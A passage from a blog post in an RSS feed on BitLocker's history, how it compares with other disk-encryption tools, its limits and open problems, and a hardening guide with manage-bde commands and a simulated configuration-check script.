&lt;p&gt;&lt;strong&gt;Generation 4 -- Windows 10 (2015):&lt;/strong&gt; XTS-AES-128 became the default for new volumes in version 1511. Software encryption was enforced after the Radboud findings. Cloud-based key escrow via Azure AD. TPM sniffing attacks (2019) showed the default TPM-only configuration was vulnerable [@adv180028, @andzakovic-2019].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generation 5 -- Windows 11 24H2 (2024):&lt;/strong&gt; Encryption by default on clean installs. Relaxed hardware requirements (no Modern Standby/HSTI needed). &lt;a href=&quot;https://paragmali.com/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/&quot; rel=&quot;noopener&quot;&gt;TPM 2.0&lt;/a&gt; mandatory. Recovery keys escrowed to Microsoft Account or Azure AD. Hardware-accelerated encryption available in 25H2 [@techpowerup-hwaccel].&lt;/p&gt;

gantt
    title BitLocker Evolution and Attack Timeline
    dateFormat YYYY
    axisFormat %Y
    section Generations
        EFS (file-level)           :g0, 2000, 2006
        Vista: AES-CBC+Elephant    :g1, 2006, 2009
        Win 7: +BitLocker To Go   :g2, 2009, 2012
        Win 8/8.1: no Elephant+eDrive :g3, 2012, 2015
        Win 10: Software-first    :g4, 2015, 2024
        Win 11 24H2: Default      :g5, 2024, 2026
    section Attacks
        Cold boot (Princeton)     :milestone, 2008, 0d
        DMA/PCILeech              :milestone, 2016, 0d
        SSD bypass (Radboud)      :milestone, 2018, 0d
        TPM sniffing              :milestone, 2019, 0d
        Thunderspy                :milestone, 2020, 0d
        Bitpixie (CVE-2023-21563) :milestone, 2023, 0d
&lt;p&gt;By 2024, BitLocker had evolved from an enterprise opt-in feature to encryption that activates without asking. But how does it compare to what Linux and macOS users have?&lt;/p&gt;
&lt;h2&gt;BitLocker vs. the Competition&lt;/h2&gt;
&lt;p&gt;BitLocker is not the only option. Every major OS now ships with full-disk encryption, and the open-source world offers capabilities that BitLocker cannot match.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;BitLocker (Win 11)&lt;/th&gt;
&lt;th&gt;VeraCrypt&lt;/th&gt;
&lt;th&gt;LUKS2 (dm-crypt)&lt;/th&gt;
&lt;th&gt;FileVault 2&lt;/th&gt;
&lt;th&gt;SEDs (TCG Opal)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Platform&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Windows&lt;/td&gt;
&lt;td&gt;Windows, macOS, Linux&lt;/td&gt;
&lt;td&gt;Linux&lt;/td&gt;
&lt;td&gt;macOS&lt;/td&gt;
&lt;td&gt;Any (firmware)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cipher&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;XTS-AES-128/256&lt;/td&gt;
&lt;td&gt;XTS-AES, Serpent, Twofish, cascades&lt;/td&gt;
&lt;td&gt;XTS-AES (default)&lt;/td&gt;
&lt;td&gt;XTS-AES-256 (APFS)&lt;/td&gt;
&lt;td&gt;AES-256 (vendor)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Key derivation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;TPM sealing + optional PIN&lt;/td&gt;
&lt;td&gt;PBKDF2 + PIM&lt;/td&gt;
&lt;td&gt;Argon2id (memory-hard)&lt;/td&gt;
&lt;td&gt;Secure Enclave&lt;/td&gt;
&lt;td&gt;Firmware-specific&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Open source&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Audited&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;FIPS 140-2 certified&lt;/td&gt;
&lt;td&gt;Quarkslab 2016; Fraunhofer/BSI 2020&lt;/td&gt;
&lt;td&gt;Community-audited&lt;/td&gt;
&lt;td&gt;Apple docs published&lt;/td&gt;
&lt;td&gt;Radboud found flaws&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Enterprise mgmt&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Intune, GPO, SCCM&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Scriptable&lt;/td&gt;
&lt;td&gt;MDM (Jamf)&lt;/td&gt;
&lt;td&gt;Vendor-specific&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Plausible deniability&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes (hidden volumes)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Performance&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Minimal (sequential); up to 50% random IOPS loss&lt;/td&gt;
&lt;td&gt;Similar&lt;/td&gt;
&lt;td&gt;Similar&lt;/td&gt;
&lt;td&gt;Near-zero (hardware)&lt;/td&gt;
&lt;td&gt;Near-zero (hardware)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;&lt;strong&gt;VeraCrypt&lt;/strong&gt; (2013) is the open-source TrueCrypt fork, maintained by Mounir Idrassi [@veracrypt-docs]. It offers cascaded ciphers (AES-Twofish-Serpent), hidden volumes for plausible deniability, and cross-platform support. Its hidden volume feature is particularly notable: a single encrypted container holds two volumes with different passwords, and the outer volume&apos;s free space is cryptographically indistinguishable from the hidden volume&apos;s ciphertext. An adversary who compels you to reveal a password gets the decoy; the hidden volume remains undetectable. VeraCrypt was audited by Quarkslab in 2016, which found 8 critical and 3 medium-severity vulnerabilities; v1.19 fixed many high-priority issues, while OSTIF noted that some complex findings were handled with documented workarounds rather than complete fixes. It was audited by Fraunhofer SIT, commissioned by the German BSI, in 2020 [@ostif-veracrypt]. What it lacks is enterprise management -- no centralized key escrow, no MDM integration, no Group Policy. For individual privacy, it is unmatched. For a fleet of 10,000 laptops, it is impractical.
VeraCrypt&apos;s hidden volumes provide plausible deniability -- you can be compelled to reveal a password, and it unlocks a decoy volume while the real data remains hidden in space that is statistically indistinguishable from random data. No other mainstream FDE tool offers this capability.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;LUKS2 with dm-crypt&lt;/strong&gt; is Linux-native full-disk encryption, maintained as part of the cryptsetup project [@cryptsetup-faq]. Its standout feature is the Argon2id key derivation function -- a memory-hard, GPU/ASIC-resistant password hash that provides superior brute-force resistance compared to BitLocker&apos;s TPM-based approach or VeraCrypt&apos;s PBKDF2 [@argon2-spec]. Why does memory-hardness matter? GPUs and ASICs can test billions of PBKDF2 hashes per second because each attempt needs little memory. Argon2id forces each attempt to allocate a configurable amount of RAM; LUKS2 calibrates the parameters to a target unlock time on the host system rather than using a fixed 1 GB default. That makes parallel brute-force attacks on GPUs prohibitively expensive. LUKS2 supports up to 32 keyslots, allowing multiple users or recovery methods per volume [@cryptsetup-faq]. It integrates with systemd-cryptenroll for TPM2 and &lt;a href=&quot;https://paragmali.com/blog/your-face-is-not-your-password-inside-windows-hellos-hardwar/&quot; rel=&quot;noopener&quot;&gt;FIDO2&lt;/a&gt; token support. But it is Linux-only, and setup requires comfort with the command line.&lt;/p&gt;

A memory-hard key derivation function (KDF) that won the Password Hashing Competition in 2015. Argon2id combines the data-dependent memory access pattern of Argon2d with the data-independent access pattern of Argon2i, providing resistance to both GPU-based brute-force attacks and side-channel attacks. Used by LUKS2 as its default KDF, replacing the older PBKDF2.
&lt;p&gt;&lt;strong&gt;FileVault 2&lt;/strong&gt; is macOS-native full-disk encryption, deeply integrated with Apple&apos;s hardware. On APFS volumes (macOS High Sierra and later), FileVault uses XTS-AES-256. On T2-equipped Intel Macs and all Apple Silicon machines, the Secure Enclave -- a dedicated security coprocessor physically isolated from the main CPU -- manages encryption keys in hardware. Unlike a discrete TPM where keys transit an external bus (the vulnerability that enables TPM sniffing), Secure Enclave keys never leave the chip. The SSD controller handles encryption in real-time using dedicated AES hardware. The result is near-zero measurable performance impact. FileVault is what happens when one company controls both the hardware and software.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Self-Encrypting Drives (SEDs)&lt;/strong&gt; conforming to TCG Opal perform encryption in the drive&apos;s firmware with zero CPU overhead. But after the Radboud findings, trusting opaque SSD firmware for security is a gamble. The Meijer and van Gastel research affected drives from Samsung and Critical that, according to the researchers, represented roughly 60% of the consumer SSD market at the time [@meijer-2019].&lt;/p&gt;
&lt;p&gt;Each approach makes different trade-offs between transparency, performance, enterprise management, and trust. But they all share one theoretical limitation.&lt;/p&gt;
&lt;h2&gt;The Limits: What No Full-Disk Encryption Can Do&lt;/h2&gt;
&lt;p&gt;Here is the uncomfortable truth that no vendor will put on the box: full-disk encryption cannot protect your data while your computer is running. That is not a bug. It is a fundamental impossibility.&lt;/p&gt;

Any full-disk encryption system must hold decryption keys in volatile memory while the OS is running. Full protection is available only when the device is powered off.
&lt;p&gt;Any FDE system -- BitLocker, VeraCrypt, LUKS, FileVault -- must load the decryption key into RAM to service I/O requests. While the key is in RAM, it is vulnerable to cold boot attacks, DMA attacks, and any malware running with kernel privileges. This is not a design flaw. It is an impossibility result. You cannot encrypt and decrypt data simultaneously without holding a key somewhere accessible [@halderman-2008].&lt;/p&gt;
&lt;h3&gt;The XTS Semantic Security Gap&lt;/h3&gt;
&lt;p&gt;XTS mode has a narrower theoretical limitation. It uses a sector-derived tweak, so identical plaintext at the same block offset in different sectors does &lt;strong&gt;not&lt;/strong&gt; produce identical ciphertext. The limitation is narrower diffusion: each 16-byte block is protected independently within the sector, so a targeted ciphertext modification corrupts the corresponding 16-byte plaintext block rather than avalanching across the entire sector. Phillip Rogaway&apos;s tweakable-block-cipher work explains why narrow-block disk modes have this shape [@rogaway-2004].&lt;/p&gt;
&lt;p&gt;Wide-block modes like EME and CMC, proposed by Shai Halevi and Rogaway, encrypt an entire sector as a single block -- changing one bit of plaintext changes &lt;em&gt;every&lt;/em&gt; bit of ciphertext across the sector [@halevi-rogaway-eme]. These modes provide stronger semantic security but at higher computational cost, and no major FDE system has adopted them.&lt;/p&gt;

NIST SP 800-111 recommends pre-boot authentication for full-disk encryption in government systems [@nist-sp800-111]. Organizations subject to NIST guidelines may find TPM-only mode insufficient for compliance -- both because of the bus sniffing vulnerability and because of the XTS narrow-block limitation. The practical recommendation is TPM+PIN with XTS-AES-256, which satisfies most regulatory frameworks even if it does not close the theoretical semantic security gap.
&lt;h3&gt;The Performance Reality&lt;/h3&gt;
&lt;p&gt;Software-based BitLocker on fast NVMe SSDs carries a real cost. TechPowerUp measured a 375% increase in CPU cycles per I/O when software BitLocker is active, with random 4K IOPS dropping by up to 50% [@techpowerup-hwaccel]. Sequential throughput impact is typically under 5% thanks to AES-NI acceleration, but the random I/O penalty matters for database workloads and developer builds.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s hardware-accelerated BitLocker, available in Windows 11 25H2, uses CPU crypto instructions and NVMe controller integration to close this gap. Early benchmarks show random 4K IOPS doubling compared to software mode, with CPU usage dropping by over 70% -- approaching unencrypted performance [@techpowerup-hwaccel].&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;No BitLocker&lt;/th&gt;
&lt;th&gt;Software BitLocker&lt;/th&gt;
&lt;th&gt;HW-Accelerated BitLocker (25H2)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Sequential read/write&lt;/td&gt;
&lt;td&gt;Baseline&lt;/td&gt;
&lt;td&gt;~5% overhead&lt;/td&gt;
&lt;td&gt;~0% overhead&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Random 4K IOPS&lt;/td&gt;
&lt;td&gt;Baseline&lt;/td&gt;
&lt;td&gt;Up to 50% loss&lt;/td&gt;
&lt;td&gt;~10% loss&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CPU cycles per I/O&lt;/td&gt;
&lt;td&gt;Baseline&lt;/td&gt;
&lt;td&gt;+375%&lt;/td&gt;
&lt;td&gt;~+30%&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;If the fundamental limits are known, what problems remain unsolved?&lt;/p&gt;
&lt;h2&gt;Open Problems: What Keeps Researchers Awake&lt;/h2&gt;
&lt;p&gt;BitLocker is mature, battle-tested, and now ubiquitous. Yet at least five significant problems remain open -- and some of them could invalidate the entire trust model.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Post-quantum readiness.&lt;/strong&gt; AES-256 survives Grover&apos;s algorithm with an effective 128-bit security level -- still intractable for foreseeable quantum computers [@nist-800-38e]. But the key &lt;em&gt;management&lt;/em&gt; layer is not quantum-safe. TPM 2.0 attestation and Azure AD key escrow use RSA-2048 or ECC P-256, both vulnerable to Shor&apos;s algorithm. NIST finalized post-quantum key encapsulation (ML-KEM) and digital signature (ML-DSA) standards in 2024 [@nist-pqc], but no shipping FDE system integrates post-quantum cryptography into its key management chain yet.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;SSD firmware auditability.&lt;/strong&gt; There is no standard mechanism to verify that a self-encrypting drive&apos;s firmware actually implements encryption correctly. The Radboud findings proved this is not hypothetical. Microsoft&apos;s policy of defaulting to software encryption works around the problem but does not solve it for hardware-only use cases [@meijer-2019].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Secure Boot trust chain revocation.&lt;/strong&gt; The bitpixie attack persists because older, vulnerable bootloaders remain trusted by Secure Boot. Revoking old certificates via DBX updates is slow and risks bricking devices on heterogeneous hardware fleets. Microsoft&apos;s KB5025885 provides a phased revocation approach, but the transition from the 2011 Microsoft UEFI CA to the 2023 CA is incomplete [@cve-2023-21563].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Recovery key awareness.&lt;/strong&gt; Encryption-by-default means millions of non-technical users have BitLocker active without understanding recovery key management. If a TPM is replaced, a BIOS update changes PCR values, or the motherboard is swapped, users who do not know they have a recovery key -- or where it is stored -- may permanently lose access to all their data [@elcomsoft-forensics].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Forensic and legal implications.&lt;/strong&gt; As every Windows device becomes encrypted by default, law enforcement and digital forensics face increasing difficulty accessing data on seized devices. Courts are grappling with compelled decryption and Fifth Amendment implications. Forensic vendors maintain tools that exploit known weaknesses (like bitpixie), but these become less effective as mitigations are deployed [@elcomsoft-forensics].
Twenty years after BitLocker first shipped, the symmetric encryption itself (AES-256) is solved. The unsolved problems are all about trust -- in hardware, in firmware, in cloud key escrow, and in users&apos; ability to manage their own recovery keys.&lt;/p&gt;
&lt;h2&gt;Practical Guide: Deploying BitLocker Correctly&lt;/h2&gt;
&lt;p&gt;Theory is useful. Configuration is what actually protects your data. Here is how to deploy BitLocker in a way that addresses the known attack surface.&lt;/p&gt;
&lt;h3&gt;Recommended Configuration&lt;/h3&gt;
&lt;p&gt;For sensitive systems, the recommended configuration is:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;TPM+PIN&lt;/strong&gt; -- Closes the TPM bus sniffing gap. The PIN adds a knowledge factor that the TPM requires before releasing the VMK. Even on discrete TPM chips, the attacker cannot extract the VMK without the PIN (though the PIN itself must be strong enough to resist brute-force) [@andzakovic-2019, @scrt-tpm-pin-2024].&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;XTS-AES-256&lt;/strong&gt; -- The maximum key length available. Configure via Group Policy: &lt;code&gt;Computer Configuration &amp;gt; Administrative Templates &amp;gt; Windows Components &amp;gt; BitLocker Drive Encryption &amp;gt; Operating System Drives &amp;gt; Choose drive encryption method and cipher strength&lt;/code&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Software encryption mode&lt;/strong&gt; -- Do not trust SSD hardware encryption. Force software mode via Group Policy: &lt;code&gt;Configure use of hardware-based encryption for operating system drives: Disabled&lt;/code&gt; [@adv180028].&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Verify recovery key location&lt;/strong&gt; -- Check that your recovery key is stored somewhere you can access. For consumers: &lt;code&gt;https://account.microsoft.com/devices/recoverykey&lt;/code&gt;. For enterprises: verify Azure AD / Entra ID escrow.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Verification Commands&lt;/h3&gt;
&lt;p&gt;{`
// Simulates the logic of manage-bde -status and Get-BitLockerVolume
// In production, run these PowerShell commands:
// manage-bde -status C:
// Get-BitLockerVolume -MountPoint C: | Select-Object *&lt;/p&gt;
&lt;p&gt;const config = {
  volume: &quot;C:&quot;,
  encryptionMethod: &quot;XTS-AES-256&quot;,
  protectors: [&quot;Tpm&quot;, &quot;RecoveryPassword&quot;],
  encryptionPercentage: 100,
  lockStatus: &quot;Unlocked&quot;,
  hardwareEncryption: false
};&lt;/p&gt;
&lt;p&gt;// Check 1: Is a PIN configured?
const hasPIN = config.protectors.some(p =&amp;gt; 
  p === &quot;TpmPin&quot; || p === &quot;TpmPinStartupKey&quot;
);
console.log(hasPIN 
  ? &quot;OK: Pre-boot PIN is configured&quot; 
  : &quot;WARNING: No pre-boot PIN -- vulnerable to TPM bus sniffing&quot;
);&lt;/p&gt;
&lt;p&gt;// Check 2: Is encryption AES-256?
const is256 = config.encryptionMethod.includes(&quot;256&quot;);
console.log(is256 
  ? &quot;OK: Using AES-256&quot; 
  : &quot;INFO: Using AES-128 (consider upgrading to 256)&quot;
);&lt;/p&gt;
&lt;p&gt;// Check 3: Software encryption?
console.log(!config.hardwareEncryption
  ? &quot;OK: Software encryption (not trusting SSD firmware)&quot;
  : &quot;WARNING: Hardware encryption in use -- verify SSD firmware integrity&quot;
);&lt;/p&gt;
&lt;p&gt;// Check 4: Recovery password exists?
const hasRecovery = config.protectors.includes(&quot;RecoveryPassword&quot;);
console.log(hasRecovery
  ? &quot;OK: Recovery password protector exists&quot;
  : &quot;WARNING: No recovery password -- data may be irrecoverable&quot;
);&lt;/p&gt;
&lt;p&gt;// Check 5: Fully encrypted?
console.log(config.encryptionPercentage === 100
  ? &quot;OK: Volume is fully encrypted&quot;
  : &quot;WARNING: Encryption is &quot; + config.encryptionPercentage + &quot;% complete&quot;
);&lt;/p&gt;
&lt;p&gt;console.log(&quot;\n--- Recommendation ---&quot;);
if (!hasPIN) {
  console.log(&quot;Run: manage-bde -protectors -add C: -TPMAndPIN&quot;);
  console.log(&quot;This adds a pre-boot PIN to mitigate bus sniffing attacks.&quot;);
}
`}&lt;/p&gt;
&lt;h3&gt;Common Pitfalls&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Firmware updates triggering recovery mode:&lt;/strong&gt; BIOS/UEFI updates change PCR values, causing the TPM to refuse VMK release. Always suspend BitLocker before firmware updates: &lt;code&gt;manage-bde -protectors -disable C:&lt;/code&gt; [@ms-bitlocker-ps].&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Dual-boot scenarios:&lt;/strong&gt; BitLocker encrypts the Windows volume; Linux cannot natively read BitLocker partitions (though the &lt;code&gt;dislocker&lt;/code&gt; tool provides limited read support [@dislocker-github]). Plan partition layouts carefully.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Hardware swaps:&lt;/strong&gt; Replacing the motherboard or TPM chip triggers recovery mode. Ensure the recovery key is accessible &lt;em&gt;before&lt;/em&gt; hardware changes.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Recovery key in deleted Microsoft Account:&lt;/strong&gt; If the Microsoft Account used during setup is later deleted, the escrowed recovery key is lost. Verify the key is backed up to multiple locations.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;

No. Full-disk encryption protects data at rest -- meaning when the device is powered off. While the OS is running, the decryption key is in RAM and vulnerable to DMA attacks, cold boot attacks, and malware with kernel access. While in sleep mode, the key is still in RAM. The protection window is narrower than most people assume: it really only covers a powered-off device stolen by someone without your recovery key.

BitLocker&apos;s source code is not publicly available, so independent code audits are not possible. However, the cryptographic design is published (Ferguson&apos;s 2006 paper), the implementation is FIPS 140-2 certified by an independent lab, and the XTS-AES cipher mode is standardized by IEEE and NIST. The recovery key escrow to Microsoft&apos;s cloud is not a &quot;backdoor&quot; -- it is a documented feature. If you do not want Microsoft to hold your recovery key, you can store it locally or in on-premises Active Directory instead.

No -- not without independent verification. The Radboud University research (Meijer and van Gastel, 2019) proved that Samsung and Critical SSDs had critically broken hardware encryption, affecting drives that the researchers said represented roughly 60% of the consumer SSD market. Microsoft now defaults to software encryption and recommends against relying on SSD hardware encryption unless independently validated. Force software mode via Group Policy.

Yes. Your Windows login password protects against *online* attacks -- someone trying to log in while the OS is running. It does nothing against *offline* attacks. An attacker who removes your drive and connects it to another machine bypasses the login screen entirely. Without encryption, your data is readable. A strong login password and full-disk encryption solve different problems.

It depends on the workload. Sequential read/write performance drops by about 5% with software BitLocker, barely noticeable in daily use thanks to AES-NI hardware acceleration. Random 4K IOPS -- important for databases and development builds -- can drop by up to 50%, with CPU cycles per I/O increasing by 375%. Microsoft&apos;s hardware-accelerated BitLocker in Windows 11 25H2 closes most of this gap, bringing random IOPS to within 10% of unencrypted performance.

Your data is permanently inaccessible. There is no master key, no backdoor, and no way to brute-force AES-256. Check these locations for your recovery key: (1) Microsoft Account at account.microsoft.com/devices/recoverykey, (2) Azure AD / Entra ID if your device is enterprise-managed, (3) a printed copy if you saved one during setup. If none of these have the key, the data is gone.

Yes, especially on laptops with discrete TPM chips. Without a PIN, the TPM releases the encryption key automatically at every boot with no human input. An attacker with brief physical access can sniff the key from the TPM&apos;s SPI bus using a \$5 Raspberry Pi Pico. A pre-boot PIN adds a knowledge factor that the TPM requires before release. Run: `manage-bde -protectors -add C: -TPMAndPIN` to enable it.
&lt;h2&gt;What Comes Next&lt;/h2&gt;
&lt;p&gt;Twenty years of BitLocker history tell a consistent story: the encryption itself was never the weak link. AES has held. XTS mode is mathematically sound. Ferguson&apos;s key hierarchy design from 2006 still works.&lt;/p&gt;
&lt;p&gt;Every real-world failure -- every headline, every conference demo, every CVE -- targeted the trust boundary around the encryption. The trust that RAM clears instantly (it does not). The trust that SSD firmware encrypts honestly (it did not). The trust that the TPM bus is not observable (it is). The trust that users understand their recovery keys (they do not).&lt;/p&gt;
&lt;p&gt;The next chapter of this story will be written by quantum computers and post-quantum cryptography. AES-256 will survive Grover&apos;s algorithm. But the RSA and ECC that protect key exchange, TPM attestation, and cloud escrow will not survive Shor&apos;s. No shipping FDE system has integrated post-quantum key management yet [@nist-pqc]. The clock is ticking -- and the question is whether the industry will act before the deadline, or after the first quantum key recovery makes the news.&lt;/p&gt;
&lt;p&gt;For now, the practical advice is simple: enable TPM+PIN, enforce software encryption, know where your recovery key is, and remember that BitLocker protects your data only when your machine is off.&lt;/p&gt;
</content:encoded><category>bitlocker</category><category>full-disk-encryption</category><category>windows-security</category><category>tpm</category><category>cryptography</category><category>xts-aes</category><category>disk-encryption</category><author>noreply@paragmali.com (Parag Mali)</author></item></channel></rss>